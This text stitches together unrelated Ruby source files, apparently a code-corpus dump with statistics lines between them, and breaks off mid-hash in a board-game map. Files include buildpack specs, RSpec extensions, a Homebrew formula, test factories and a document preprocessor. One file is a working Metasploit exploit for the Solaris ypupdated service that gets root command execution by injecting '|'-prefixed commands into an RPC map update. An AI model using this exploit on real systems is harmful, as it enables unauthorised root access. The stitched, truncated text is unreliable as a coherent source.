require_relative '../spec_helper' describe "cnb" do it "locally runs default_ruby app" do Cutlass::App.new("default_ruby").transaction do |app| app.pack_build expect(app.stdout).to include("Installing rake") app.run_multi("ruby -v") do |out| expect(out.stdout).to match(LanguagePack::RubyVersion::DEFAULT_VERSION_NUMBER) end app.run_multi("bundle list") do |out| expect(out.stdout).to match("rack") end app.run_multi("gem list") do |out| expect(out.stdout).to match("rack") end app.run_multi(%Q{ruby -e "require 'rack'; puts 'done'"}) do |out| expect(out.stdout).to match("done") end # Test cache app.pack_build expect(app.stdout).to include("Using rake") end end it "uses multiple buildpacks" do Dir.mktmpdir do |second_buildpack_dir| FileUtils.mkdir_p("#{second_buildpack_dir}/bin") File.open("#{second_buildpack_dir}/buildpack.toml", "w") do |f| f.write <<~EOM # Buildpack API version api = "0.2" # Buildpack ID and metadata [buildpack] id = "com.examples.buildpacks.test_ruby_export" version = "0.0.1" name = "Test Ruby Export Buildpack" # Stacks that the buildpack will work with [[stacks]] id = "heroku-20" [[stacks]] id = "org.cloudfoundry.stacks.cflinuxfs3" EOM end File.open("#{second_buildpack_dir}/bin/detect", "w") do |f| f.write <<~EOM #! /usr/bin/env bash exit 0 EOM end File.open("#{second_buildpack_dir}/bin/build", "w") do |f| f.write <<~EOM #! /usr/bin/env bash echo "Which gem: $(which gem)" exit 0 EOM end FileUtils.chmod("+x", "#{second_buildpack_dir}/bin/detect") FileUtils.chmod("+x", "#{second_buildpack_dir}/bin/build") Cutlass::App.new("default_ruby", buildpacks: [:default, second_buildpack_dir]).transaction do |app| app.pack_build expect(app.stdout).to match("Compiling Ruby/Rack") expect(app.stdout).to match("com.examples.buildpacks.test_ruby_export") expect(app.stdout).to match("Which gem: /workspace/bin/gem") end end end it "locally runs rails getting started" do Cutlass::App.new("ruby-getting-started").transaction do |app| app.pack_build expect(app.stdout).to match("Compiling Ruby/Rails") expect(app.run("ruby -v").stdout).to match("2.7.4") end end end
27.020833
105
0.595991
01eb17f58a8db86d185141bb40ed2a17a78ea292
2,848
module Spec module Extensions module Main # Creates and returns a class that includes the ExampleGroupMethods # module. Which ExampleGroup type is created depends on the directory of the file # calling this method. For example, Spec::Rails will use different # classes for specs living in <tt>spec/models</tt>, # <tt>spec/helpers</tt>, <tt>spec/views</tt> and # <tt>spec/controllers</tt>. # # It is also possible to override autodiscovery of the example group # type with an options Hash as the last argument: # # describe "name", :type => :something_special do ... # # The reason for using different behaviour classes is to have different # matcher methods available from within the <tt>describe</tt> block. # # See Spec::Example::ExampleFactory#register for details about how to # register special implementations. # def describe(*args, &block) raise ArgumentError if args.empty? raise ArgumentError unless block args << {} unless Hash === args.last args.last[:spec_path] = caller(0)[1] Spec::Example::ExampleGroupFactory.create_example_group(*args, &block) end alias :context :describe # Creates an example group that can be shared by other example groups # # == Examples # # share_examples_for "All Editions" do # it "all editions behaviour" ... # end # # describe SmallEdition do # it_should_behave_like "All Editions" # # it "should do small edition stuff" do # ... # end # end def share_examples_for(name, &block) describe(name, :shared => true, &block) end alias :shared_examples_for :share_examples_for # Creates a Shared Example Group and assigns it to a constant # # share_as :AllEditions do # it "should do all editions stuff" ... # end # # describe SmallEdition do # it_should_behave_like AllEditions # # it "should do small edition stuff" do # ... # end # end # # And, for those of you who prefer to use something more like Ruby, you # can just include the module directly # # describe SmallEdition do # include AllEditions # # it "should do small edition stuff" do # ... # end # end def share_as(name, &block) begin Object.const_set(name, share_examples_for(name, &block)) rescue NameError => e raise NameError.new(e.message + "\nThe first argument to share_as must be a legal name for a constant\n") end end end end end include Spec::Extensions::Main
32.735632
115
0.596559
e9a9bd941955f171968ed11ec6e3aaa9c148ed3e
290
# encoding: utf-8 # Code generated by Microsoft (R) AutoRest Code Generator. # Changes may cause incorrect behavior and will be lost if the code is # regenerated. module Azure end module Azure::Resources end module Azure::Resources::Mgmt end module Azure::Resources::Mgmt::V2019_05_10 end
29
70
0.782759
1895f83a7ef2fd69eabbda051b5fa7e4799b4e5a
21
depends "ruby_build"
10.5
20
0.809524
bb50921c7b0b7cca6e6d152fc14c4c4b20205cf6
3,253
class Wangle < Formula desc "Modular, composable client/server abstractions framework" homepage "https://github.com/facebook/wangle" url "https://github.com/facebook/wangle/releases/download/v2021.09.27.00/wangle-v2021.09.27.00.tar.gz" sha256 "c23840578f73a0316ef58cd0e95ed001dbf5e893740d72c157f579ac2342558a" license "Apache-2.0" head "https://github.com/facebook/wangle.git", branch: "master" bottle do sha256 cellar: :any, arm64_big_sur: "49bfbd4664d9a349d6b721cffbf144aee4fbc6bc7cb8c315d4313d234996f1e3" sha256 cellar: :any, big_sur: "6cb44fa77d4014e5a2f1dc2978dc8368ca71b97e0a3705278c31c0044bb948f8" sha256 cellar: :any, catalina: "467066e9c01790758560384384ae09f0e845670406d354b78206699f9d67b0ae" sha256 cellar: :any, mojave: "9814e4d63c4d91902e75f1be7054a4ebc7cd79843b8e512d5ff5cb29179e76cf" sha256 cellar: :any_skip_relocation, x86_64_linux: "fbe37e8cabde712d8a70262edb862158845b1bf37ad961748191ea2b7a70d140" end depends_on "cmake" => :build depends_on "boost" depends_on "double-conversion" depends_on "fizz" depends_on "fmt" depends_on "folly" depends_on "gflags" depends_on "glog" depends_on "libevent" depends_on "libsodium" depends_on "lz4" depends_on "[email protected]" depends_on "snappy" depends_on "zstd" uses_from_macos "bzip2" uses_from_macos "zlib" on_linux do depends_on "gcc" end fails_with gcc: "5" def install cd "wangle" do system "cmake", ".", "-DBUILD_TESTS=OFF", "-DBUILD_SHARED_LIBS=ON", *std_cmake_args system "make", "install" system "make", "clean" system "cmake", ".", "-DBUILD_TESTS=OFF", "-DBUILD_SHARED_LIBS=OFF", *std_cmake_args system "make" lib.install "lib/libwangle.a" pkgshare.install Dir["example/echo/*.cpp"] end end test do cxx_flags = %W[ -std=c++14 -I#{include} -I#{Formula["[email protected]"].opt_include} -L#{Formula["gflags"].opt_lib} -L#{Formula["glog"].opt_lib} -L#{Formula["folly"].opt_lib} -L#{Formula["fizz"].opt_lib} -L#{lib} -lgflags -lglog -lfolly -lfizz -lwangle ] on_linux do cxx_flags << "-L#{Formula["boost"].opt_lib}" cxx_flags << "-lboost_context-mt" cxx_flags << "-ldl" cxx_flags << "-lpthread" end system ENV.cxx, pkgshare/"EchoClient.cpp", *cxx_flags, "-o", "EchoClient" system ENV.cxx, pkgshare/"EchoServer.cpp", *cxx_flags, "-o", "EchoServer" port = free_port ohai "Starting EchoServer on port #{port}" fork { exec testpath/"EchoServer", "-port", port.to_s } sleep 3 require "pty" output = "" PTY.spawn(testpath/"EchoClient", "-port", port.to_s) do |r, w, pid| ohai "Sending data via EchoClient" w.write "Hello from Homebrew!\nAnother test line.\n" sleep 3 Process.kill "TERM", pid begin ohai "Reading received data" r.each_line { |line| output += line } rescue Errno::EIO # GNU/Linux raises EIO when read is done on closed pty end end assert_match("Hello from Homebrew!", output) assert_match("Another test line.", output) end end
31.582524
122
0.659699
39a8553c3d056414e31c2eadc92a2cfc72db1c98
208
require 'spec_helper' describe TopSupplement do it 'has a version number' do expect(TopSupplement::VERSION).not_to be nil end it 'does something useful' do expect(false).to eq(true) end end
17.333333
48
0.721154
4a2d57b75cd6b2ff891add171ac79bf1f5cddd93
1,602
FactoryGirl.define do factory :user do password { "railsisomakase" } password_confirmation { "railsisomakase" } email { Faker::Internet.email } factory :v1_user do md5_password "e53522351c4cfce1b2c3ecb3f4dbf2cd" # letmeinplease # v1 users will never sign up, so do not use the interactor, just generate the model. initialize_with do new end end factory :v2_user do password "letmeinplease" password_confirmation "letmeinplease" end factory :developer do end factory :oauth_user do end factory :iot_user do email "[email protected]" end factory :old_user_github do email "[email protected]" end factory :admin do after(:create) do |user| user.update_attribute :roles, ['admin'] user.update_attribute :created_at, 1.day.ago user.update_attribute :updated_at, 1.day.ago end end ## !! Overriding the initializer !! ## # # We do this because the SignUp interactor is critical to how users are created. # But it means you can't FactoryGirl.create a user and expect that it just works. # If you need to set various attributes on a factory girl'd user, you must do # it separately from the .create. initialize_with do VCR.use_cassette "users/create" do SignUp.call(attributes.merge(root_url: "http://test.example.com/")).user end end end end
26.262295
91
0.609863
79b1db4dbef4bbfdbd98ac095a84362fef33586e
474
# frozen_string_literal: true require 'spec_helper' require 'vk/api/groups/methods/get_catalog' RSpec.describe Vk::API::Groups::Methods::GetCatalog do subject(:model) { described_class } it { is_expected.to be < Dry::Struct } it { is_expected.to be < Vk::Schema::Method } describe 'attributes' do subject(:attributes) { model.instance_methods(false) } it { is_expected.to include :category_id } it { is_expected.to include :subcategory_id } end end
27.882353
58
0.725738
33692c43b0649d80c4787ed73953d409d4ca0c49
2,670
## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::SunRPC def initialize(info = {}) super(update_info(info, 'Name' => 'Solaris ypupdated Command Execution', 'Description' => %q{ This exploit targets a weakness in the way the ypupdated RPC application uses the command shell when handling a MAP UPDATE request. Extra commands may be launched through this command shell, which runs as root on the remote host, by passing commands in the format '|<command>'. Vulnerable systems include Solaris 2.7, 8, 9, and 10, when ypupdated is started with the '-i' command-line option. }, 'Author' => [ 'I)ruid <druid[at]caughq.org>' ], 'License' => MSF_LICENSE, 'References' => [ ['CVE', '1999-0209'], ['OSVDB', '11517'], ['BID', '1749'], ], 'Privileged' => true, 'Platform' => %w{ solaris unix }, 'Arch' => ARCH_CMD, 'Payload' => { 'Space' => 1024, 'DisableNops' => true, 'Compat' => { 'PayloadType' => 'cmd', 'RequiredCmd' => 'generic perl telnet', } }, 'Targets' => [ ['Automatic', { }], ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Dec 12 1994' )) register_options( [ OptString.new('HOSTNAME', [false, 'Remote hostname', 'localhost']), OptInt.new('GID', [false, 'GID to emulate', 0]), OptInt.new('UID', [false, 'UID to emulate', 0]) ], self.class ) end def exploit hostname = datastore['HOSTNAME'] program = 100028 progver = 1 procedure = 1 print_status('Sending PortMap request for ypupdated program') pport = sunrpc_create('udp', program, progver) print_status("Sending MAP UPDATE request with command '#{payload.encoded}'") print_status('Waiting for response...') sunrpc_authunix(hostname, datastore['UID'], datastore['GID'], []) command = '|' + payload.encoded msg = XDR.encode(command, 2, 0x78000000, 2, 0x78000000) sunrpc_call(procedure, msg) sunrpc_destroy print_status('No Errors, appears to have succeeded!') rescue ::Rex::Proto::SunRPC::RPCTimeout print_warning('Warning: ' + $!) end end
31.411765
81
0.553933
acdf6265e7a1e43f558fa96c119acffdecba057a
793
# encoding: UTF-8 require_dependency 'carto/superadmin/metrics_controller_helper' module Carto module Superadmin class UsersController < ::Superadmin::SuperadminController include MetricsControllerHelper respond_to :json ssl_required :usage before_filter :load_user rescue_from ArgumentError, with: :render_format_error def usage usage = get_usage(@user, nil, @user.last_billing_cycle) respond_with(usage) end private def render_format_error(exception) render(json: { error: exception.message }, status: 422) end def load_user @user = Carto::User.where(id: params[:id]).first render json: { error: 'User not found' }, status: 404 unless @user end end end end
22.027778
74
0.67087
1a07e43145d4eec53f5f7842827fe6a85bb3afd2
79
$LOAD_PATH.unshift File.expand_path('../../lib', __FILE__) require 'smart_uri'
26.333333
58
0.734177
5db4872d29cbf658c14d26bc6b865e6df39c402f
459
# == Schema Information # # Table name: roles # # id :integer not null, primary key # name :string(255) # resource_id :integer # resource_type :string(255) # created_at :datetime not null # updated_at :datetime not null # class Role < ActiveRecord::Base has_and_belongs_to_many :users, :join_table => :users_roles belongs_to :resource, :polymorphic => true has_many :permissions scopify end
24.157895
61
0.64488
8761a23c28679282d651f96c6345f20e46aaefc9
233
require "rspec-puppet" fixture_path = File.expand_path(File.join(__FILE__, "..", "fixtures")) RSpec.configure do |c| c.manifest_dir = File.join(fixture_path, "manifests") c.module_path = File.join(fixture_path, "modules") end
25.888889
70
0.729614
01bd8fc6b207659a7c762ce2fca65a91174c190e
318
# frozen_string_literal: true require_relative '../downloads/client' module Crunchbase # Utilities module Utilities # Daily csv export module Downloads def download_bulk(dir, extract: false) Crunchbase::Downloads::Client.new.download_bulk(dir, extract: extract) end end end end
19.875
78
0.710692
0156bc1e17376942d740406d3cf9bf15f156aaf9
1,145
ActiveAdmin.register_page "Dashboard" do menu priority: 0, label: proc{ I18n.t("active_admin.dashboard") } content :title => proc{ I18n.t("active_admin.dashboard") } do # Here is an example of a simple dashboard with columns and panels. columns do column do panel I18n.t("active_admin.statistics.events_by_category") do pie_chart Event.group_by_category end end column do panel I18n.t("active_admin.statistics.users_over_time") do line_chart User.over_time end end end columns do column do panel I18n.t("active_admin.statistics.single_events_this_week_by_day") do column_chart SingleEvent.this_week_by_day end end column do panel I18n.t("active_admin.statistics.single_events_this_week_by_category") do pie_chart SingleEvent.this_week_by_category end end end columns do column do panel I18n.t("active_admin.statistics.single_events_this_week_by_city") do pie_chart SingleEvent.this_week_by_city end end end end end
26.022727
86
0.665502
ac6a40e2f5459a69f51cf57b9dac247182c0e4fe
2,084
class Fn < Formula desc "Command-line tool for the fn project" homepage "https://fnproject.github.io" url "https://github.com/fnproject/cli/archive/0.4.49.tar.gz" sha256 "1378ca0e114666a5d7dfa726557d0196982269cbf91a38a6c667e0d7f4a2a32e" bottle do cellar :any_skip_relocation sha256 "79525a473b2241f59f6b4125f8dbe8ca44405a843f0f80454e862abfe35adaca" => :high_sierra sha256 "cb2a6448b726d5e0a0ecd7684076c285145e7a7de0c9e31f8fde37bd6f97401c" => :sierra sha256 "40666fe81e40c22b7b27fc1fb8d939b4dbd0d50f32539028635514c6fff1ba66" => :el_capitan end depends_on "dep" => :build depends_on "go" => :build def install ENV["GOPATH"] = buildpath dir = buildpath/"src/github.com/fnproject/cli" dir.install Dir["*"] cd dir do system "dep", "ensure" system "go", "build", "-o", "#{bin}/fn" prefix.install_metafiles end end test do require "socket" assert_match version.to_s, shell_output("#{bin}/fn --version") system "#{bin}/fn", "init", "--runtime", "go", "--name", "myfunc" assert_predicate testpath/"func.go", :exist?, "expected file func.go doesn't exist" assert_predicate testpath/"func.yaml", :exist?, "expected file func.yaml doesn't exist" server = TCPServer.new("localhost", 0) port = server.addr[1] pid = fork do loop do socket = server.accept response = '{"route": {"path": "/myfunc", "image": "fnproject/myfunc"} }' socket.print "HTTP/1.1 200 OK\r\n" \ "Content-Length: #{response.bytesize}\r\n" \ "Connection: close\r\n" socket.print "\r\n" socket.print response socket.close end end begin ENV["FN_API_URL"] = "http://localhost:#{port}" ENV["FN_REGISTRY"] = "fnproject" expected = "/myfunc created with fnproject/myfunc" output = shell_output("#{bin}/fn routes create myapp myfunc --image fnproject/myfunc:0.0.1") assert_match expected, output.chomp ensure Process.kill("TERM", pid) Process.wait(pid) end end end
34.733333
98
0.65499
084a4ddcf5d51be93f9f17f22524c79df5cda382
5,833
# frozen_string_literal: true require "liquid" require "asciidoctor" require "asciidoctor/reader" require "lutaml" require "metanorma/plugin/lutaml/utils" require "metanorma/plugin/lutaml/utils" require "metanorma/plugin/lutaml/express_remarks_decorator" module Metanorma module Plugin module Lutaml # Class for processing Lutaml files class LutamlPreprocessor < Asciidoctor::Extensions::Preprocessor REMARKS_ATTRIBUTE = "remarks".freeze def process(document, reader) input_lines = reader.readlines.to_enum express_indexes = Utils.parse_document_express_indexes( document, input_lines ) result_content = processed_lines(document, input_lines, express_indexes) result_reader = Asciidoctor::PreprocessorReader.new(document, result_content) result_reader end protected def content_from_files(document, file_paths) file_list = file_paths.map do |file_path| File.new(Utils.relative_file_path(document, file_path), encoding: "UTF-8") end ::Lutaml::Parser.parse(file_list) end private def processed_lines(document, input_lines, express_indexes) result = [] loop do result .push(*process_text_blocks( document, input_lines, express_indexes )) end result end def process_text_blocks(document, input_lines, express_indexes) line = input_lines.next block_match = line.match(/^\[(?:\blutaml\b|\blutaml_express\b),([^,]+)?,?([^,]+)?,?([^,]+)?\]/) return [line] if block_match.nil? end_mark = input_lines.next parse_template(document, collect_internal_block_lines(document, input_lines, end_mark), block_match, express_indexes) end def collect_internal_block_lines(_document, input_lines, end_mark) current_block = [] while (block_line = input_lines.next) != end_mark current_block.push(block_line) end current_block end def contexts_items(block_match, document, express_indexes) contexts_names = block_match[1].split(";").map(&:strip) file_paths = [] result = contexts_names.each_with_object([]) do |path, res| if express_indexes[path] res.push(express_indexes[path]) else file_paths.push(path) end end if !file_paths.empty? from_files = content_from_files(document, file_paths) # TODO: decide how to handle expressir multiply file parse as one object and lutaml if from_files.is_a?(Array) result.push(*from_files.map(&:to_liquid)) else from_files = from_files.to_liquid from_files["schemas"] = from_files["schemas"].map do |n| n.merge("relative_path_prefix" => Utils.relative_file_path(document, File.dirname(n["file"]))) end result.push(from_files) end end result end def parse_template(document, current_block, block_match, express_indexes) options = parse_options(block_match[3]) contexts_items(block_match, document, express_indexes) .map do |items| if items["schemas"] items["schemas"] = items["schemas"].map do |j| opts = options.merge("relative_path_prefix" => j["relative_path_prefix"]) decorate_context_items(j, opts) end end parse_context_block(document: document, context_lines: current_block, context_items: items, context_name: block_match[2].strip) end.flatten rescue StandardError => e document.logger.warn("Failed to parse lutaml block: #{e.message}") [] end def parse_options(options_string) options_string .to_s .scan(/(.+?)=(\s?[^\s]+)/) .map { |elem| elem.map(&:strip) } .to_h end def decorate_context_items(context_items, options) return context_items if !context_items.is_a?(Hash) context_items .map do |(key, val)| if val.is_a?(Hash) [key, decorate_context_items(val, options)] elsif key == REMARKS_ATTRIBUTE [key, val&.map do |remark| Metanorma::Plugin::Lutaml::ExpressRemarksDecorator .call(remark, options) end] elsif val.is_a?(Array) [key, val.map { |n| decorate_context_items(n, options) }] else [key, val] end end .to_h end def parse_context_block(context_lines:, context_items:, context_name:, document:) render_result, errors = Utils.render_liquid_string( template_string: context_lines.join("\n"), context_items: context_items, context_name: context_name, document: document ) Utils.notify_render_errors(document, errors) render_result.split("\n") end end end end end
34.720238
110
0.541917
21bfc21213e3450bf23aabe71f56eceb14c88b0c
19,773
# frozen_string_literal: true module Engine module Game module G1862 module Map TILES = { '5' => 10, '6' => 10, '14' => 11, '15' => 10, '16' => 2, '16_1a' => { 'count' => 2, 'color' => 'green', 'hidden' => 1, 'code' => 'town=revenue:20,loc:0;path=a:0,b:_0;path=a:2,b:_0;path=a:1,b:3', }, '16_1b' => { 'count' => 2, 'color' => 'green', 'hidden' => 1, 'code' => 'town=revenue:20,loc:3;path=a:1,b:_0;path=a:3,b:_0;path=a:0,b:2', }, '16_2' => { 'count' => 2, 'color' => 'green', 'hidden' => 1, 'code' => 'town=revenue:20;town=revenue:20;path=a:1,b:_0;path=a:3,b:_0;path=a:0,b:_1;path=a:2,b:_1', }, '17' => 5, '17_1' => { 'count' => 5, 'color' => 'green', 'hidden' => 1, 'code' => 'town=revenue:20;path=a:0,b:_0;path=a:4,b:_0;path=a:1,b:3', }, '17_2' => { 'count' => 5, 'color' => 'green', 'hidden' => 1, 'code' => 'town=revenue:20;town=revenue:20;path=a:0,b:_0;path=a:4,b:_0;path=a:1,b:_1;path=a:3,b:_1', }, '18' => 5, '18_1a' => { 'count' => 5, 'color' => 'green', 'hidden' => 1, 'code' => 'town=revenue:20;path=a:0,b:_0;path=a:3,b:_0;path=a:1,b:2', }, '18_1b' => { 'count' => 5, 'color' => 'green', 'hidden' => 1, 'code' => 'town=revenue:20;path=a:1,b:_0;path=a:2,b:_0;path=a:0,b:3', }, '18_2' => { 'count' => 5, 'color' => 'green', 'hidden' => 1, 'code' => 'town=revenue:20;town=revenue:20;path=a:1,b:_0;path=a:2,b:_0;path=a:0,b:_1;path=a:3,b:_1', }, '19' => 4, '19_1a' => { 'count' => 4, 'color' => 'green', 'hidden' => 1, 'code' => 'town=revenue:20,loc:0;path=a:0,b:_0;path=a:3,b:_0;path=a:2,b:4', }, '19_1b' => { 'count' => 4, 'color' => 'green', 'hidden' => 1, 'code' => 'town=revenue:20;path=a:2,b:_0;path=a:4,b:_0;path=a:0,b:3', }, '19_2' => { 'count' => 4, 'color' => 'green', 'hidden' => 1, 'code' => 'town=revenue:20;town=revenue:20;path=a:2,b:_0;path=a:4,b:_0;path=a:0,b:_1;path=a:3,b:_1', }, '20' => 6, '20_1' => { 'count' => 6, 'color' => 'green', 'hidden' => 1, 'code' => 'town=revenue:20;path=a:0,b:_0;path=a:3,b:_0;path=a:1,b:4', }, '20_2' => { 'count' => 6, 'color' => 'green', 'hidden' => 1, 'code' => 'town=revenue:20;town=revenue:20;path=a:0,b:_0;path=a:3,b:_0;path=a:1,b:_1;path=a:4,b:_1', }, '21' => 2, '21_1a' => { 'count' => 2, 'color' => 'green', 'hidden' => 1, 'code' => 'town=revenue:20;path=a:0,b:_0;path=a:2,b:_0;path=a:3,b:4', }, '21_1b' => { 'count' => 2, 'color' => 'green', 'hidden' => 1, 'code' => 'town=revenue:20;path=a:3,b:_0;path=a:4,b:_0;path=a:0,b:2', }, '21_2' => { 'count' => 2, 'color' => 'green', 'hidden' => 1, 'code' => 'town=revenue:20;town=revenue:20;path=a:3,b:_0;path=a:4,b:_0;path=a:0,b:_1;path=a:2,b:_1', }, '22' => 2, '22_1a' => { 'count' => 2, 'color' => 'green', 'hidden' => 1, 'code' => 'town=revenue:20;path=a:0,b:_0;path=a:4,b:_0;path=a:2,b:3', }, '22_1b' => { 'count' => 2, 'color' => 'green', 'hidden' => 1, 'code' => 'town=revenue:20;path=a:2,b:_0;path=a:3,b:_0;path=a:0,b:4', }, '22_2' => { 'count' => 2, 'color' => 'green', 'hidden' => 1, 'code' => 'town=revenue:20;town=revenue:20;path=a:2,b:_0;path=a:3,b:_0;path=a:0,b:_1;path=a:4,b:_1', }, '53y' => { 'count' => 6, 'color' => 'green', 'code' => 'city=revenue:50,slots:2;path=a:0,b:_0;path=a:2,b:_0;path=a:4,b:_0;label=Y', }, '57' => 12, '61y' => { 'count' => 3, 'color' => 'brown', 'code' => 'city=revenue:60,slots:2;path=a:0,b:_0;path=a:2,b:_0;path=a:4,b:_0;path=a:4,b:_0;label=Y', }, '201' => 2, '202' => 4, '611' => 8, '619' => 10, '621' => 2, '778' => { 'count' => 4, 'color' => 'brown', 'code' => 'path=a:0,b:4;path=a:1,b:3;path=a:2,b:5', }, '778_1a' => { 'count' => 4, 'color' => 'brown', 'hidden' => 1, 'code' => 'town=revenue:20;path=a:0,b:_0;path=a:4,b:_0;path=a:1,b:3;path=a:2,b:5', }, '778_1b' => { 'count' => 4, 'color' => 'brown', 'hidden' => 1, 'code' => 'town=revenue:20;path=a:2,b:_0;path=a:5,b:_0;path=a:1,b:3;path=a:0,b:4', }, '778_2a' => { 'count' => 4, 'color' => 'brown', 'hidden' => 1, 'code' => 'town=revenue:20;town=revenue:20;path=a:0,b:_0;path=a:4,b:_0;path=a:2,b:_1;path=a:5,b:_1;'\ 'path=a:1,b:3', }, '778_2b' => { 'count' => 4, 'color' => 'brown', 'hidden' => 1, 'code' => 'town=revenue:20;town=revenue:20;path=a:0,b:_0;path=a:4,b:_0;path=a:1,b:_1;path=a:3,b:_1;'\ 'path=a:2,b:5', }, '778_3' => { 'count' => 4, 'color' => 'brown', 'hidden' => 1, 'code' => 'town=revenue:20;town=revenue:20,loc:2;town=revenue:20;path=a:0,b:_0;path=a:4,b:_0;'\ 'path=a:2,b:_1;path=a:5,b:_1;path=a:1,b:_2;path=a:3,b:_2', }, '779' => { 'count' => 3, 'color' => 'brown', 'code' => 'path=a:0,b:4;path=a:1,b:5;path=a:2,b:3', }, '779_1a' => { 'count' => 3, 'color' => 'brown', 'hidden' => 1, 'code' => 'town=revenue:20;path=a:0,b:_0;path=a:4,b:_0;path=a:1,b:5;path=a:2,b:3', }, '779_1b' => { 'count' => 3, 'color' => 'brown', 'hidden' => 1, 'code' => 'town=revenue:20;path=a:1,b:_0;path=a:5,b:_0;path=a:0,b:4;path=a:2,b:3', }, '779_1c' => { 'count' => 3, 'color' => 'brown', 'hidden' => 1, 'code' => 'town=revenue:20;path=a:2,b:_0;path=a:3,b:_0;path=a:0,b:4;path=a:1,b:5', }, '779_2a' => { 'count' => 3, 'color' => 'brown', 'hidden' => 1, 'code' => 'town=revenue:20;town=revenue:20;path=a:0,b:_0;path=a:4,b:_0;path=a:1,b:_1;path=a:5,b:_1;'\ 'path=a:2,b:3', }, '779_2b' => { 'count' => 3, 'color' => 'brown', 'hidden' => 1, 'code' => 'town=revenue:20;town=revenue:20;path=a:0,b:_0;path=a:4,b:_0;path=a:2,b:_1;path=a:3,b:_1;'\ 'path=a:1,b:5', }, '779_2c' => { 'count' => 3, 'color' => 'brown', 'hidden' => 1, 'code' => 'town=revenue:20;town=revenue:20;path=a:1,b:_0;path=a:5,b:_0;path=a:2,b:_1;path=a:3,b:_1;'\ 'path=a:0,b:4', }, '779_3' => { 'count' => 3, 'color' => 'brown', 'hidden' => 1, 'code' => 'town=revenue:20;town=revenue:20;town=revenue:20;path=a:1,b:_0;path=a:5,b:_0;'\ 'path=a:2,b:_1;path=a:3,b:_1;path=a:0,b:_2;path=a:4,b:_2', }, '780' => { 'count' => 3, 'color' => 'brown', 'code' => 'path=a:0,b:3;path=a:1,b:2;path=a:4,b:5', }, '780_1a' => { 'count' => 3, 'color' => 'brown', 'hidden' => 1, 'code' => 'town=revenue:20;path=a:0,b:_0;path=a:3,b:_0;path=a:1,b:2;path=a:4,b:5', }, '780_1b' => { 'count' => 3, 'color' => 'brown', 'hidden' => 1, 'code' => 'town=revenue:20;path=a:1,b:_0;path=a:2,b:_0;path=a:0,b:3;path=a:4,b:5', }, '780_2a' => { 'count' => 3, 'color' => 'brown', 'hidden' => 1, 'code' => 'town=revenue:20;town=revenue:20;path=a:0,b:_0;path=a:3,b:_0;path=a:1,b:_1;path=a:2,b:_1;'\ 'path=a:4,b:5', }, '780_2b' => { 'count' => 3, 'color' => 'brown', 'hidden' => 1, 'code' => 'town=revenue:20;town=revenue:20;path=a:1,b:_0;path=a:2,b:_0;path=a:4,b:_1;path=a:5,b:_1;'\ 'path=a:0,b:3', }, '780_3' => { 'count' => 3, 'color' => 'brown', 'hidden' => 1, 'code' => 'town=revenue:20;town=revenue:20;town=revenue:20;path=a:1,b:_0;path=a:2,b:_0;'\ 'path=a:4,b:_1;path=a:5,b:_1;path=a:0,b:_2;path=a:3,b:_2', }, '790' => 4, '791' => 4, '792' => 2, '793' => 3, '794' => 3, '795' => { 'count' => 1, 'color' => 'brown', 'code' => 'city=revenue:80,slots:4;path=a:0,b:_0;path=a:1,b:_0;path=a:2,b:_0;path=a:4,b:_0;'\ 'path=a:5,b:_0;label=I', }, '796' => 3, '797' => { 'count' => 1, 'color' => 'brown', 'code' => 'city=revenue:60,slots:2;path=a:0,b:_0;path=a:1,b:_0;path=a:4,b:_0;label=H', }, '798' => 3, '798_1' => { 'count' => 3, 'color' => 'brown', 'hidden' => 1, 'code' => 'town=revenue:20;path=a:0,b:_0;path=a:3,b:_0;path=a:1,b:4;path=a:2,b:5', }, '798_2' => { 'count' => 3, 'color' => 'brown', 'hidden' => 1, 'code' => 'town=revenue:20;town=revenue:20;path=a:0,b:_0;path=a:3,b:_0;path=a:1,b:_1;path=a:4,b:_1;'\ 'path=a:2,b:5', }, '798_3' => { 'count' => 3, 'color' => 'brown', 'hidden' => 1, 'code' => 'town=revenue:20;town=revenue:20;town=revenue:20;path=a:0,b:_0;path=a:3,b:_0;'\ 'path=a:1,b:_1;path=a:4,b:_1;path=a:2,b:_2;path=a:5,b:_2', }, '891y' => { 'count' => 3, 'color' => 'brown', 'code' => 'city=revenue:60,slots:2;path=a:0,b:_0;path=a:1,b:_0;path=a:2,b:_0;path=a:3,b:_0;label=Y', }, '8850' => { 'count' => 6, 'color' => 'yellow', 'code' => 'town=revenue:20;path=a:0,b:_0;path=a:5,b:_0', }, '8851' => { 'count' => 8, 'color' => 'yellow', 'code' => 'town=revenue:20;path=a:0,b:_0;path=a:4,b:_0', }, '8852' => { 'count' => 12, 'color' => 'yellow', 'code' => 'town=revenue:20;path=a:0,b:_0;path=a:3,b:_0', }, }.freeze LOCATION_NAMES = { 'A6' => 'Midlands', 'A10' => 'The West', 'E2' => 'Wells-Next-The-Sea', 'B3' => 'Holbeach', 'C4' => "King's Lynn", 'D3' => 'Hunstanton', 'E4' => 'Fakenham', 'F3' => 'Cromer', 'G4' => 'N Walsham', 'B5' => 'Wisbech', 'C6' => 'Downham Market', 'D5' => 'Swaffham', 'E6' => 'Watton', 'F5' => 'Norwich', 'G6' => 'Acle', 'H5' => 'Great Yarmouth', 'B7' => 'March', 'C8' => 'Ely', 'D7' => 'Brandon', 'E8' => 'Thetford', 'F7' => 'Diss', 'G8' => 'Beccles', 'H7' => 'Lowestoft', 'B9' => 'Cambridge', 'C10' => 'Newmarket', 'D9' => 'Bury St. Edmunds', 'E10' => 'Stowmarket', 'F9' => 'Framingham', 'G10' => 'Woodbridge', 'B11' => 'Royston', 'C12' => 'Great Dunmow', 'D11' => 'Sudbury', 'E12' => 'Colchester', 'F11' => 'Ipswitch', 'G12' => 'Felixstowe', 'B13' => "Bishop's Stortford", 'C14' => 'London', 'D13' => 'Witham', 'E14' => 'Tiptree', 'F13' => 'Harwich', }.freeze HEXES = { white: { # towns %w[ B3 D3 G4 E6 G6 D7 F9 E10 G10 B11 C12 ] => 'town=revenue:0', %w[ E14 ] => 'town=revenue:0;border=edge:4,type:impassable', # cities %w[ E2 F3 C4 E4 B5 D5 C6 B7 F7 H7 E8 G8 C10 D11 B13 D13 ] => 'city=revenue:0', %w[ F5 B9 E12 ] => 'city=revenue:0;label=N', %w[ H5 C8 D9 ] => 'city=revenue:0;label=Y', %w[ F11 ] => 'city=revenue:0;label=N;border=edge:0,type:impassable', %w[ G12 ] => 